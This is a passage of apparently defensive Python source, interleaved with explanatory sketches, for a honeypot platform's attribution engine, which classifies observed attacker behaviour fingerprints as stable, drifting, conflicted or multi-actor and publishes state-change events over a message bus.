# ── Hash merger ───────────────────────────────────────────────────────
# Rotations within HASH_DRIFT_WINDOW_SECS count toward state transitions:
# 1 to HASH_DRIFT_MAX rotations → drifting; more → conflicted. The values
# mirror the DEBT-032 fingerprint-rotation calibration, bumped by one
# because the attribution engine takes one rotation as evidence-of-life,
# not yet evidence-of-drift.
HASH_DRIFT_MAX = 2
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
# ── Multi-actor cap ───────────────────────────────────────────────────
# multi_actor confidence is capped to keep the dashboard honest about
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
# flapping primitives on flaky networks look like two operators.
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
# Minimum number of primitives that must independently flag
# ``multi_actor`` for the same identity before
# ``attribution.profile.multi_actor_suspected`` fires.
MULTI_ACTOR_MIN_PRIMITIVES = 2
# Tick interval for the periodic walk in
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
# var in v1; hardcoded in v0.
MULTI_ACTOR_TICK_SECS = 60.0


@@ -0,0 +1,418 @@
"""Per-(identity, primitive) state-machine — the attribution engine's
core merge logic.
Pure: given a list of BEHAVE observations for one
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
returns the derived state. No DB, no bus, no I/O. The worker
(``decnet.correlation.attribution_worker``) is responsible for loading
the observations and writing the state row.
State vocabulary is frozen at five values (see
``ATTRIBUTION-ENGINE.md``):
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
* ``stable`` — recent N agree
* ``drifting`` — recent N stable but disagree with older N
* ``conflicted`` — recent N split
* ``multi_actor`` — conflicted + cross-session alternation pattern
Phase 2 ships :func:`aggregate_categorical` (the dominant ValueKind
for BEHAVE-SHELL primitives). Phase 3 adds the numeric and hash mergers
and the ValueKind dispatcher in :func:`aggregate_observations`.
"""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from typing import Any, Sequence
from decnet.correlation.attribution import _thresholds as _T
__all__ = [
"AttributionState",
"aggregate_observations",
"aggregate_categorical",
"aggregate_numeric",
"aggregate_hash",
]
@dataclass(frozen=True)
class AttributionState:
"""Output of the merger for one ``(identity, primitive)`` pair.
The fields map onto :class:`AttributionStateRow` columns; the
worker composes the final dict for ``upsert_attribution_state``
by adding ``identity_uuid`` + ``primitive`` (the merger does not
own the natural key) and a ``last_change_ts`` derived from the
prior row.
"""
current_value: Any
state: str
confidence: float
observation_count: int
last_observation_ts: float
def aggregate_observations(
observations: Sequence[dict[str, Any]],
*,
value_kind: str | None = None,
) -> AttributionState:
"""Run the merger over *observations* and return derived state.
*observations* is a list of dicts with at minimum ``value``,
``ts``, ``confidence`` (matching
``ObservationRow.observations_time_series`` output). Sessions
are derived from the ``ts`` axis — the merger does not need a
separate session id; cross-session alternation is detected by
the gap distribution. Sessions are NOT collapsed before the
merger; ``multi_actor`` reasons over the full per-observation
series.
*value_kind* is a hint from the BEHAVE primitive registry.
``"categorical"`` (or ``None``, treated as categorical),
``"numeric"`` and ``"hash"`` dispatch to the matching merger; any
other value raises :class:`ValueError`.
"""
if not observations:
return _unknown(0.0, count=0)
if value_kind in (None, "categorical"):
return aggregate_categorical(observations)
if value_kind == "numeric":
return aggregate_numeric(observations)
if value_kind == "hash":
return aggregate_hash(observations)
raise ValueError(
f"aggregate_observations: unknown value_kind={value_kind!r}; "
"expected 'categorical' | 'numeric' | 'hash' | None",
)
def aggregate_numeric(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Numeric merger — for primitives whose ``value`` is an int /
float (e.g. ``toolchain.c2.beacon_interval_ms``,
``motor.paste_burst_rate``).
Compares the EWMA of the recent window against the EWMA of the
older window; reports dispersion as coefficient of variation.
Checks run in this order:
* < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
* an older window exists and the mean shifted
>= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
* otherwise → ``stable`` (the fall-through case; this function does
not consult ``NUMERIC_STABLE_DISPERSION_PCT``, so moderate
dispersion that hasn't yet become drift still reads as stable)
Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
tighter dispersion = higher confidence. Conflicted is ``0.5``
by convention; we cannot meaningfully claim certainty in a
statistic computed over a degenerate sample.
``current_value`` is the recent EWMA, not the last raw
observation: numeric primitives are noisy by nature and
surfacing the smoothed estimate keeps the dashboard from
flapping on every tick. ``multi_actor`` is *not* a numeric state
in v0 — bimodal distributions belong to the categorical
detector once the primitive's value space is bucketed.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=_safe_float(observations[-1].get("value")) if n else None,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
older_vals = [
_safe_float(o.get("value"))
for o in observations[-2 * window: -window]
]
recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
recent_cv = _coef_of_variation(recent_vals, recent_mean)
if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
return AttributionState(
current_value=recent_mean,
state="conflicted",
confidence=0.5,
observation_count=n,
last_observation_ts=last_ts,
)
if older_vals:
older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
denom = abs(older_mean) if older_mean != 0 else 1.0
mean_shift = abs(recent_mean - older_mean) / denom
if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
return AttributionState(
current_value=recent_mean,
state="drifting",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=recent_mean,
state="stable",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
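The numeric decision order can be tried in isolation. The following is a minimal sketch, assuming the v0 constants from the thresholds module (copied here as local names) and operating on bare float lists rather than observation dicts; `classify` is a hypothetical helper, not part of the engine.

```python
from typing import Sequence

# Assumed copies of the v0 thresholds (NUMERIC_EWMA_ALPHA etc.).
ALPHA = 0.3
DRIFT_MEAN_SHIFT = 0.30
CONFLICT_CV = 1.0


def ewma(values: Sequence[float], alpha: float) -> float:
    """Single-pass EWMA seeded with the first value."""
    it = iter(values)
    smoothed = next(it)
    for v in it:
        smoothed = alpha * v + (1.0 - alpha) * smoothed
    return smoothed


def coef_of_variation(values: Sequence[float], mean: float) -> float:
    """Population-style stdev divided by |mean|, measured around `mean`."""
    variance = sum((v - mean) ** 2 for v in values) / len(values)
    stdev = variance ** 0.5
    if mean == 0:
        return 0.0 if stdev == 0 else 1e9
    return stdev / abs(mean)


def classify(older: Sequence[float], recent: Sequence[float]) -> str:
    """Hypothetical helper: conflicted is checked first, then drifting."""
    recent_mean = ewma(recent, ALPHA)
    if coef_of_variation(recent, recent_mean) > CONFLICT_CV:
        return "conflicted"
    if older:
        older_mean = ewma(older, ALPHA)
        denom = abs(older_mean) if older_mean != 0 else 1.0
        if abs(recent_mean - older_mean) / denom >= DRIFT_MEAN_SHIFT:
            return "drifting"
    return "stable"
```

Because the dispersion check runs before the mean-shift check, a window that is both wildly dispersed and shifted is reported as conflicted rather than drifting.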
def aggregate_hash(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Hash merger — for rotation-resistant fingerprints
(``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
The merger does NOT recompute hashes; DEBT-032
(``decnet.correlation.fingerprint_rotation``) already produces
one observation per rotation event. The state machine counts
distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
most recent observation:
* 0 rotations (single hash, any count) → ``stable``
* 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
* > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
``unknown`` fires only on empty input — a single hash with one
observation is enough signal to say "stable", because hashes
don't have a noisy baseline the way categorical/numeric
primitives do.
``current_value`` is the most recent hash. Confidence is
``1 / (1 + rotations_in_window)``: one rotation halves
confidence, two cut it to a third, and so on.
"""
n = len(observations)
if n == 0:
return _unknown(0.0, count=0)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
in_window = [
o for o in observations
if float(o.get("ts", 0.0)) >= window_start
]
distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
rotations = max(0, distinct - 1)
confidence = 1.0 / (1.0 + rotations)
if rotations == 0:
state = "stable"
elif rotations <= _T.HASH_DRIFT_MAX:
state = "drifting"
else:
state = "conflicted"
return AttributionState(
current_value=last_value,
state=state,
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
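The rotation count and confidence formula can be checked with a small stand-alone sketch. It assumes the v0 values `HASH_DRIFT_MAX = 2` and a 24h window, and a hypothetical `hash_state` helper that returns a plain tuple instead of an `AttributionState`.

```python
from typing import Any, Sequence

# Assumed copies of the v0 thresholds.
HASH_DRIFT_MAX = 2
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60


def hash_state(observations: Sequence[dict[str, Any]]) -> tuple[str, int, float]:
    """Hypothetical helper: (state, rotations, confidence) for a ts-ordered series."""
    last_ts = float(observations[-1]["ts"])
    window_start = last_ts - HASH_DRIFT_WINDOW_SECS
    # Distinct non-None hashes seen inside the window ending at the last observation.
    distinct = {
        o["value"]
        for o in observations
        if float(o["ts"]) >= window_start and o["value"] is not None
    }
    rotations = max(0, len(distinct) - 1)
    confidence = 1.0 / (1.0 + rotations)
    if rotations == 0:
        state = "stable"
    elif rotations <= HASH_DRIFT_MAX:
        state = "drifting"
    else:
        state = "conflicted"
    return state, rotations, confidence
```

Note that rotations are derived from distinct values, so a hash that flips away and back (A, B, A) inside the window counts as one rotation, not two.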
def _ewma(values: Sequence[float], alpha: float) -> float:
"""Single-pass EWMA. Empty input is illegal; callers gate on
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
it = iter(values)
smoothed = next(it)
for v in it:
smoothed = alpha * v + (1.0 - alpha) * smoothed
return smoothed
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
signal; returns +inf-equivalent (1e9) when the mean is exactly
zero and the signal isn't constant — so the conflicted threshold
fires without us having to special-case it upstream."""
if not values:
return 0.0
diffs_sq = [(v - mean) ** 2 for v in values]
variance = sum(diffs_sq) / len(values)
stdev = variance ** 0.5
if mean == 0:
return 0.0 if stdev == 0 else 1e9
return stdev / abs(mean)
def _safe_float(value: Any) -> float:
"""Defensive coercion — observations may carry value=None on
unknown-emitter primitives. Treat None as 0.0; the dispersion
check will surface the resulting flat baseline as 'stable'
which is the honest answer for a single-observation primitive
that hasn't fired yet."""
if value is None:
return 0.0
if isinstance(value, bool):
return 1.0 if value else 0.0
return float(value)
def aggregate_categorical(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Categorical merger — the dominant case for BEHAVE-SHELL.
Compares the recent N-window against the older N-window. With
``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
= 4``:
* fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent window has a clear majority + matches older window → ``stable``
* recent window has a clear majority + differs from older window → ``drifting``
* recent window split + alternation pattern across observations → ``multi_actor``
* recent window split + no alternation → ``conflicted``
Confidence is the recent-window agreement ratio; ``multi_actor``
is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
the most-recent observation's value as ``current_value``
regardless of state — the dashboard wants a value to render
even on ``conflicted`` rows.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=last_value,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
recent_values = [o.get("value") for o in recent]
recent_count = Counter(recent_values)
top_value, top_count = recent_count.most_common(1)[0]
recent_size = len(recent)
confidence = top_count / recent_size
is_recent_clear = top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
)
if not is_recent_clear:
# Split recent window. Distinguish multi_actor (alternation)
# from random conflict.
if _is_alternation(observations):
return AttributionState(
current_value=last_value,
state="multi_actor",
confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=last_value,
state="conflicted",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
# Recent window has a clear majority. Compare to the prior
# window to decide stable vs drifting.
older = observations[-2 * window: -window]
if not older:
# Only one window's worth of data — call it stable. The
# dashboard already gates "unknown" on
# MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
# only when the operator has produced enough observations
# for one full window but not two.
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
older_values = [o.get("value") for o in older]
older_count = Counter(older_values)
older_top_value, older_top_count = older_count.most_common(1)[0]
older_size = len(older)
older_clear = older_top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
)
if not older_clear:
# Older window was itself conflicted; we just stabilised.
# That's drift in the colloquial sense — the attacker
# converged onto a single behaviour.
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
if older_top_value != top_value:
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
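The window comparison can be sketched on bare value lists. This is a simplified illustration, assuming the v0 constants (window 5, majority 4, floor 3); `categorical_state` is a hypothetical helper that folds the `multi_actor` / `conflicted` distinction into a single `"split"` label.

```python
from collections import Counter
from typing import Any, Sequence

# Assumed copies of the v0 thresholds.
WINDOW_N = 5
MAJORITY = 4
MIN_OBS = 3


def clear_majority(values: Sequence[Any]) -> tuple[Any, int, bool]:
    """Top value, its count, and whether it clears the (size-capped) threshold."""
    top_value, top_count = Counter(values).most_common(1)[0]
    return top_value, top_count, top_count >= min(MAJORITY, len(values))


def categorical_state(values: Sequence[Any]) -> tuple[str, float]:
    """Hypothetical helper: (state, confidence) for a ts-ordered value list."""
    if len(values) < MIN_OBS:
        return "unknown", 0.0
    recent = values[-WINDOW_N:]
    top, top_count, recent_clear = clear_majority(recent)
    confidence = top_count / len(recent)
    if not recent_clear:
        return "split", confidence  # multi_actor or conflicted in the real merger
    older = values[-2 * WINDOW_N:-WINDOW_N]
    if not older:
        return "stable", confidence
    older_top, _, older_clear = clear_majority(older)
    if not older_clear or older_top != top:
        return "drifting", confidence
    return "stable", confidence
```

The `min(MAJORITY, len(values))` cap is what lets a series of three or four unanimous observations count as a clear majority before the window is full.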
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
"""Heuristic: do recent observations alternate between two values
(operator A → B → A → B), as opposed to random thrashing?
Conservative: requires at least 4 observations in the window,
exactly 2 distinct values, and that flips outnumber repeats by
at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
that flapping primitives on flaky networks look like two
operators; this guard is what keeps the false-positive rate down.
"""
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
if len(recent) < 4:
return False
values = [o.get("value") for o in recent]
distinct = set(values)
if len(distinct) != 2:
return False
flips = sum(
1 for i in range(1, len(values)) if values[i] != values[i - 1]
)
repeats = (len(values) - 1) - flips
return flips >= 2 * max(repeats, 1)
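A few concrete windows make the 2:1 flip rule easier to see. The sketch below restates the heuristic over a plain list of values, assuming a window of 5; the function name and sample values are illustrative only.

```python
from typing import Any, Sequence


def is_alternation(values: Sequence[Any], window: int = 5) -> bool:
    """True when the last `window` values flip between exactly two values."""
    recent = list(values[-window:])
    if len(recent) < 4:
        return False
    if len(set(recent)) != 2:
        return False
    # A flip is any adjacent pair that differs; everything else is a repeat.
    flips = sum(1 for i in range(1, len(recent)) if recent[i] != recent[i - 1])
    repeats = (len(recent) - 1) - flips
    return flips >= 2 * max(repeats, 1)


print(is_alternation(["a", "b", "a", "b", "a"]))  # 4 flips, 0 repeats
print(is_alternation(["a", "a", "b", "b", "a"]))  # 2 flips, 2 repeats
```

The `max(repeats, 1)` floor means at least two flips are always required, even when there are no repeats at all.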
def _unknown(last_ts: float, *, count: int) -> AttributionState:
return AttributionState(
current_value=None,
state="unknown",
confidence=0.0,
observation_count=count,
last_observation_ts=last_ts,
)


@@ -0,0 +1,394 @@
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
Subscribes to ``attacker.observation.>`` and, for each event, ensures
the source attacker has a stub identity in ``attacker_identities``.
On top of that Phase 1 skeleton, the handler in this module also runs
the Phase 2/3 mergers over the identity's observation series and
upserts the resulting ``attribution_state`` row.
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
with a wake event, fall back to poll-only if the bus is unavailable,
publish derived events with :func:`publish_safely`, log per-handler
exceptions and continue.
Trigger isolation: the per-event handler is wrapped in a single
try/except. Any exception is logged and the loop continues with the
next event. This is the same posture BEHAVE-SHELL's
``_handler.handle_session_ended`` adopts.
"""
from __future__ import annotations
import asyncio
import contextlib
from typing import Any
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
run_control_listener_signal as _run_control_listener_signal,
run_health_heartbeat as _run_health_heartbeat,
)
from decnet.correlation.attribution import _thresholds as _T
from decnet.correlation.attribution.aggregate import aggregate_observations
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
try:
from behave_shell.spec import (
PRIMITIVE_REGISTRY,
ValueKind,
)
_BEHAVE_REGISTRY_AVAILABLE = True
except ImportError: # pragma: no cover
PRIMITIVE_REGISTRY = {}
ValueKind = None
_BEHAVE_REGISTRY_AVAILABLE = False
log = get_logger("correlation.attribution_worker")
_WORKER_NAME = "attribution"
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
async def run_attribution_loop(
repo: BaseRepository,
*,
shutdown: asyncio.Event | None = None,
multi_actor_tick_secs: float | None = None,
) -> None:
"""Run the attribution worker until cancelled.
Three concurrent tasks under one supervisor:
1. ``_consume_observations`` — bus subscription on
``attacker.observation.>``; per-event handler upserts state.
2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
firing ``attribution.profile.multi_actor_suspected`` when an
identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
``multi_actor`` state. Phase 5.
3. Health + control standard channels.
*shutdown* is an optional external stop signal.
*multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
(tests use this to drive the correlator without sleeping for a
minute).
"""
log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
bus: BaseBus | None = None
sub_task: asyncio.Task | None = None
tick_task: asyncio.Task | None = None
heartbeat_task: asyncio.Task | None = None
control_task: asyncio.Task | None = None
tick_secs = (
multi_actor_tick_secs
if multi_actor_tick_secs is not None
else _T.MULTI_ACTOR_TICK_SECS
)
try:
candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
await candidate.connect()
bus = candidate
sub_task = asyncio.create_task(
_consume_observations(bus, repo),
)
tick_task = asyncio.create_task(
_multi_actor_tick_loop(bus, repo, tick_secs),
)
heartbeat_task = asyncio.create_task(
_run_health_heartbeat(bus, _WORKER_NAME),
)
control_task = asyncio.create_task(
_run_control_listener_signal(bus, _WORKER_NAME),
)
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: bus unavailable, idle until bus returns: %s",
exc,
)
if shutdown is None:
shutdown = asyncio.Event()
try:
await shutdown.wait()
except (asyncio.CancelledError, KeyboardInterrupt):
log.info("attribution worker stopped")
finally:
for task in (sub_task, tick_task, heartbeat_task, control_task):
if task is None:
continue
task.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
async def _consume_observations(
bus: BaseBus, repo: BaseRepository,
) -> None:
"""Pull events off ``attacker.observation.>`` and dispatch each
to :func:`handle_observation_event`.
Per-event exceptions are caught and logged; the subscription
survives bad payloads. If the subscription itself dies (bus
disconnect), the worker idles — the supervisor systemd unit
will restart on a clean exit.
"""
try:
sub = bus.subscribe(_OBSERVATION_PATTERN)
async with sub:
async for event in sub:
try:
await handle_observation_event(bus, repo, event)
except Exception: # noqa: BLE001
log.exception("attribution worker: handler failed")
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: subscriber for %s died (%s)",
_OBSERVATION_PATTERN, exc,
)
async def handle_observation_event(
bus: BaseBus | None,
repo: BaseRepository,
event: Any,
) -> None:
"""Handle one ``attacker.observation.<primitive>`` event.
Ensures the source attacker has a stub identity, loads the
per-(identity, primitive) observation series, runs the merger,
upserts the new state, and emits
``attribution.profile.state_changed`` on transition.
*event* is whatever shape :class:`BaseBus`'s subscription yields —
a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
fields. The payload carries the BEHAVE envelope plus DECNET-side
``attacker_uuid`` denorm (see
``decnet.profiler.behave_shell._handler._publish_observation``).
"""
payload = _payload_of(event)
attacker_uuid = payload.get("attacker_uuid")
primitive = payload.get("primitive")
if not attacker_uuid or not primitive:
log.debug(
"attribution worker: skipping malformed event (uuid=%r primitive=%r)",
attacker_uuid, primitive,
)
return
identity_uuid = await repo.ensure_stub_identity_for_attacker(
str(attacker_uuid),
)
if identity_uuid is None:
log.info(
"attribution worker: no Attacker row for uuid=%s yet; deferring",
attacker_uuid,
)
return
primitive_str = str(primitive)
# Load the full per-(identity, primitive) observation series.
# v0 with 1:1 stub identities, this is the single attacker's
# series; v1's clusterer makes it a cross-attacker union.
observations = await repo.observations_for_identity_primitive(
identity_uuid, primitive_str,
)
if not observations:
log.debug(
"attribution worker: no observations yet for identity=%s "
"primitive=%s (race with upsert)",
identity_uuid, primitive_str,
)
return
# Run merger.
value_kind = _value_kind_for(primitive_str)
new_state = aggregate_observations(observations, value_kind=value_kind)
# Load prior state to detect transitions.
prior = await repo.get_attribution_state(identity_uuid, primitive_str)
state_changed = prior is None or prior.get("state") != new_state.state
# Persist. last_change_ts is locked to the prior row when state is
# unchanged so the dashboard's "stable since" timestamp doesn't
# reset on every observation.
if prior is not None and not state_changed:
last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
else:
last_change_ts = new_state.last_observation_ts
await repo.upsert_attribution_state({
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"current_value": new_state.current_value,
"state": new_state.state,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"last_change_ts": last_change_ts,
"last_observation_ts": new_state.last_observation_ts,
})
# Emit state_changed only on transition. Idempotent re-runs (same
# observations, same merger output) produce no event — matches
# the loop-prevention invariant that ttp.tagged uses.
if state_changed and bus is not None:
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
{
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"old_state": prior.get("state") if prior else None,
"new_state": new_state.state,
"current_value": new_state.current_value,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"ts": new_state.last_observation_ts,
},
event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
)
log.info(
"attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
identity_uuid, primitive_str,
(prior or {}).get("state") or "<new>", new_state.state,
new_state.confidence,
)
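The transition check and the `last_change_ts` lock can be illustrated without a repository or bus. This is a minimal sketch, assuming the prior row is a plain dict (or `None`); `resolve_change` is a hypothetical helper name.

```python
from typing import Any, Optional


def resolve_change(
    prior: Optional[dict[str, Any]],
    new_state: str,
    new_observation_ts: float,
) -> tuple[bool, float]:
    """Hypothetical helper: return (state_changed, last_change_ts)."""
    state_changed = prior is None or prior.get("state") != new_state
    if prior is not None and not state_changed:
        # Same state as before: keep the old timestamp so "stable since"
        # does not reset on every observation.
        return state_changed, float(prior.get("last_change_ts", new_observation_ts))
    return state_changed, new_observation_ts
```

Only the first element of the tuple gates the `state_changed` event, so replaying the same observations yields `False` and no new event.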
def _value_kind_for(primitive: str) -> str:
"""Resolve a BEHAVE primitive name to the merger's ValueKind tag.
Maps the BEHAVE registry's ``ValueKind`` enum onto the three
mergers the engine ships:
* ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
``"categorical"`` (BOOL is a 2-cardinality categorical;
FREE_STRING and ARRAY collapse to opaque-token categorical
until a v1 specialised merger lands)
* ``NUMERIC`` → ``"numeric"``
* ``HASH`` → ``"hash"``
Unknown primitives (registry miss) default to categorical — the
safest fallback because the categorical merger is one-outlier-
tolerant and won't lie about confidence on noisy categorical
data the way a numeric merger would on non-numeric values.
"""
if not _BEHAVE_REGISTRY_AVAILABLE:
return "categorical"
spec = PRIMITIVE_REGISTRY.get(primitive)
if spec is None or ValueKind is None:
return "categorical"
if spec.kind is ValueKind.NUMERIC:
return "numeric"
if spec.kind is ValueKind.HASH:
return "hash"
return "categorical"
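The mapping from registry kinds to merger tags can be exercised with stand-ins. In the sketch below, `ValueKind`, `PrimitiveSpec` and `REGISTRY` are hypothetical substitutes for the `behave_shell.spec` objects (only the member names listed in the docstring and the `kind` attribute are taken from the source), and `shell.example_flag` is an invented primitive name.

```python
from dataclasses import dataclass
from enum import Enum


class ValueKind(Enum):  # hypothetical stand-in for behave_shell.spec.ValueKind
    CATEGORICAL = "categorical"
    BOOL = "bool"
    FREE_STRING = "free_string"
    ARRAY = "array"
    NUMERIC = "numeric"
    HASH = "hash"


@dataclass(frozen=True)
class PrimitiveSpec:  # hypothetical: only the `kind` attribute is modelled
    kind: ValueKind


REGISTRY = {
    "motor.paste_burst_rate": PrimitiveSpec(ValueKind.NUMERIC),
    "toolchain.ssh.hassh_client": PrimitiveSpec(ValueKind.HASH),
    "shell.example_flag": PrimitiveSpec(ValueKind.BOOL),  # invented name
}


def value_kind_for(primitive: str) -> str:
    """Map a primitive name to 'numeric', 'hash', or the categorical fallback."""
    spec = REGISTRY.get(primitive)
    if spec is None:
        return "categorical"
    if spec.kind is ValueKind.NUMERIC:
        return "numeric"
    if spec.kind is ValueKind.HASH:
        return "hash"
    return "categorical"
```

Everything that is not explicitly numeric or hash, including a registry miss, lands on the categorical merger.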
def _payload_of(event: Any) -> dict[str, Any]:
"""Extract the dict payload from a BusEvent or fall through if
*event* is already a dict (test fixtures may pass either)."""
payload = getattr(event, "payload", event)
return payload if isinstance(payload, dict) else {}
async def _multi_actor_tick_loop(
bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
"""Walk ``attribution_state`` every *interval_secs* and emit
``attribution.profile.multi_actor_suspected`` for any identity
whose multi_actor primitives changed since the last tick.
Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
frozenset(primitives). Same primitive set as last fire → no
re-emit. New primitive joining the set → re-emit. Set shrinks
below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
re-arms.
In-memory dedup is honest for v0 — restart-resets are
acceptable because the underlying ``attribution_state`` rows
persist; on first tick after restart we re-emit the current
set. v1 may persist a ``multi_actor_suspect_log`` table.
"""
last_fired: dict[str, frozenset[str]] = {}
try:
while True:
try:
await tick_multi_actor(bus, repo, last_fired)
except Exception: # noqa: BLE001
log.exception("attribution worker: multi_actor tick failed")
await asyncio.sleep(interval_secs)
except asyncio.CancelledError:
raise
async def tick_multi_actor(
bus: BaseBus | None,
repo: BaseRepository,
last_fired: dict[str, frozenset[str]],
) -> int:
"""One pass of the cross-primitive correlator. Public for tests.
Returns the number of ``multi_actor_suspected`` events emitted.
"""
candidates = await repo.list_multi_actor_identities()
fired = 0
seen_now: set[str] = set()
for entry in candidates:
identity_uuid = str(entry["identity_uuid"])
primitives: list[str] = sorted(entry.get("primitives") or [])
seen_now.add(identity_uuid)
if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
# Repo already filters to >= 2 today; defensive against
# future schema drift.
continue
signature = frozenset(primitives)
if last_fired.get(identity_uuid) == signature:
continue
last_fired[identity_uuid] = signature
if bus is None:
continue
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
{
"identity_uuid": identity_uuid,
"primitives": primitives,
"evidence_summary": (
f"{len(primitives)} primitives flagged multi_actor"
),
"confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
"ts": _now(),
},
event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
)
fired += 1
log.info(
"attribution worker: multi_actor_suspected identity=%s primitives=%s",
identity_uuid, primitives,
)
# Rearm: any identity that was in last_fired but no longer in
# candidates dropped below the threshold; remove so the next
# qualifying flap re-fires.
for stale in [k for k in last_fired if k not in seen_now]:
del last_fired[stale]
return fired
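The dedupe and re-arm behaviour is easiest to follow across several ticks. The following is a synchronous sketch, assuming candidates arrive as a dict of identity to primitive list; `tick` is a hypothetical stand-in that returns the identities it would have published for.

```python
from typing import Mapping, Sequence

MIN_PRIMITIVES = 2  # assumed copy of MULTI_ACTOR_MIN_PRIMITIVES


def tick(
    candidates: Mapping[str, Sequence[str]],
    last_fired: dict[str, frozenset[str]],
) -> list[str]:
    """Hypothetical stand-in: identities that would fire on this pass."""
    fired: list[str] = []
    seen_now: set[str] = set()
    for identity, primitives in candidates.items():
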